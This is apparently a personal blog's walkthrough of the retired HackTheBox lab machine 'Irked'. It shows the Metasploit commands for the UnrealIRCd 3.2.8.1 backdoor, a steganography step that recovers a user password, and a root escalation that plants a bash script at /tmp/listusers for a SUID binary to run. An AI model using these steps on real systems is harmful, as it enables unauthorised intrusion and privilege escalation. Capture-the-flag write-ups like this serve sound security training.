Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Irked
|htbmachinesretired|

Summary

Irked,a Linux box created by HackTheBox user MrAgent, was an overall easy difficulty box.This box involved around finding an exploit on irc and getting a low-privilege shell, after we have a shell there is a hint on the box which point us toward steganography which give us a password using which we can get user.Root on this box was about finding a SUID set non standard binary which is executing anything in /tmp/listusers.

Enumeration

Scanning The Network

nmap Scan

1
$ nmap -sC -sV 10.10.10.117

Checking the Web server we only see the emoji on the index page.
Running dirbuster also result in no routes.
I download the image

1
$ wget http://10.10.10.117/irked.jpg

Lets check the UnrealIRCd
checking it in searchsploit we see the version 3.2.8.1 has a Backdoor Command Execution.

Exploiting the Server

Let’s fire up metasploit and see if we can get a command execution on the irc server.

1
2
3
4
5
msf >use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 10.10.10.117
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

Running this give us a shell so lets get a better tty shell by running.

1
python -c 'import pty;pty.spawn("/bin/bash");'

Privilege Escalation to Become user.

Doing **ls -la ** in /home/djmardov/Documents we find .backup file which look interesting and we also see we can not read user.txt yet. cat-ing the file we see the message.

1
2
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

So the password is related to some steganography. Steghide is the most common steganography tool which use password.

Try this UPupDOWNdownLRlrBAbaSSss on the irked.jpg image gives us the password. Which is on the index page.

1
steghide extact -sf irked.jpg
1
Kab6h+m+bbp2J:HG

This yield us a pass.txt which is the password.
Let’s try to su to djmardov using this as the password.

1
2
3
$ su djmardov
Password: Kab6h+m+bbp2J:HG
$ cat djmardov/Documents/user.txt

Now we own User so let us move to Privilege Escalation to root.

PRIVILEGED ESCALATION

Finding binaries with SET UID or GUID bit set show us these files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ find / -perm -u=s -type f 2>/dev/null

/tmp/listusers/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

We can see /usr/bin/viewuser is non-standard linux binary.
Executing the binary we see it is trying to execute /tmp/listusers which is not found.

Let us create that file with a shell in it as shown

1
2
#!/bin/bash
/bin/bash

Re-executing the binary now give us a shell as root so we can read the root.txt

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/irked/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxeasyirc-exploitsteganographysuid-binary